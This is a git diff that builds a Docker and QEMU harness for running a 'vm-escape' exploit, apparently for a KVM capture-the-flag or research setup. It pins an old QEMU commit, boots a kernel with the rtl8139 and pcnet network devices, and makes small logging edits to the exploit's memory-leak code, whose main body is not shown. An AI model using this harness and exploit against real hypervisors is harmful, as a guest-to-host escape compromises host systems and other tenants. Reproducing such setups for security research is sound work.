diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..92c6c0a --- /dev/null +++ b/.gitignore @@ -0,0 +1,4 @@ +newinitrd.img +./extracted/**/** +ramdisk.img +/extracted/ diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000..bd8880f --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "qemu"] + path = qemu + url = https://github.com/qemu/qemu.git diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..36166f7 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,33 @@ +FROM ubuntu:18.04 +RUN apt-get update && apt-get install git -y +RUN git clone https://github.com/qemu/qemu.git +WORKDIR qemu +RUN git checkout bd80b59 +RUN DEBIAN_FRONTEND=noninteractive apt-get install python gcc bison flex make libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev ninja-build -y +RUN mkdir -p bin/debug/native && \ + cd bin/debug/native && \ + ../../../configure --target-list=x86_64-softmmu --enable-debug \ + --disable-werror +RUN cd bin/debug/native && make && make install +RUN DEBIAN_FRONTEND=noninteractive apt-get install cpio initramfs-tools-core -y +# (mkinitramfs -o initrd || true) && \ +RUN mkdir -p /qemu/tmp/tmp/extracted/ +COPY extracted /qemu/tmp/tmp/extracted +#unmkinitramfs initrd ./extracted && \ +RUN cd /qemu/tmp/tmp && \ + cd extracted && \ + cd early && \ + find . -print0 | cpio --null --create --format=newc > /qemu/tmp/tmp/newinitrd && \ + cd ../early2 && \ + find kernel -print0 | cpio --null --create --format=newc >> /qemu/tmp/tmp/newinitrd + +COPY run_vm_escape.sh ./ +RUN apt-get install wget -y +RUN wget https://storage.googleapis.com/kvmctf/latest.tar.gz +RUN tar xzf latest.tar.gz +RUN cp kvmctf-6.1.74/bzImage/bzImage ./ && mkdir /vm-escape +COPY ./vm-escape.c ./Makefile /vm-escape +RUN make -C /vm-escape/ && cp /vm-escape/vm-escape /qemu/tmp/tmp/extracted/main/bin +RUN cd /qemu/tmp/tmp/extracted/main && \ + find . | cpio --create --format=newc | xz --format=lzma >> /qemu/tmp/tmp/newinitrd + diff --git a/Makefile b/Makefile index 841ea2e..7f6fd38 100644 --- a/Makefile +++ b/Makefile @@ -1,3 +1,4 @@ +LDFLAGS= -pthread -lpthread CFLAGS=-g -lpthread -std=c11 -D_DEFAULT_SOURCE all: vm-escape diff --git a/init.sh b/init.sh new file mode 100755 index 0000000..3f72318 --- /dev/null +++ b/init.sh @@ -0,0 +1,9 @@ +#mkinitramfs, extract ramdisk.img +mkinitramfs -o ramdisk.img +unmkinitramfs ramdisk.img ./extracted + +#build everything +docker build . -t vm_escape + +#run docker run_vm_escape +docker run --device=/dev/kvm -ti vm_escape ./run_vm_escape.sh diff --git a/qemu b/qemu new file mode 160000 index 0000000..bd80b59 --- /dev/null +++ b/qemu @@ -0,0 +1 @@ +Subproject commit bd80b5963f58c601f31d3186b89887bf8e182fb5 diff --git a/run_vm_escape.sh b/run_vm_escape.sh new file mode 100755 index 0000000..d73f503 --- /dev/null +++ b/run_vm_escape.sh @@ -0,0 +1,8 @@ +qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \ + -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \ + -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \ + -L ./qemu/pc-bios \ + -nographic \ + -append "console=ttyS0 nokaslr" \ + -initrd /qemu/tmp/tmp/newinitrd \ + -boot c -kernel ./bzImage diff --git a/vm-escape.c b/vm-escape.c index 68a273d..44e436c 100644 --- a/vm-escape.c +++ b/vm-escape.c @@ -725,6 +725,10 @@ size_t qemu_get_leaked_chunk(struct rtl8139_ring *ring, size_t nb_packet, } } } + if (!nb_leak) { + warnx("[!] searched %lu packets with %lu size, %"PRIxHPTR", no chunk found", + nb_packet, size, (long unsigned) leak); + } return nb_leak; } @@ -1015,7 +1019,7 @@ int main() if (!nb_leak) { errx(-1, "[!] failed to find usable chunks"); } - warnx("[+] found %d potential ObjectProperty structs in memory", nb_leak); + warnx("[+] found %lu potential ObjectProperty structs in memory", nb_leak); score = qemu_get_leaked_object_property(leak, nb_leak, &leak_object,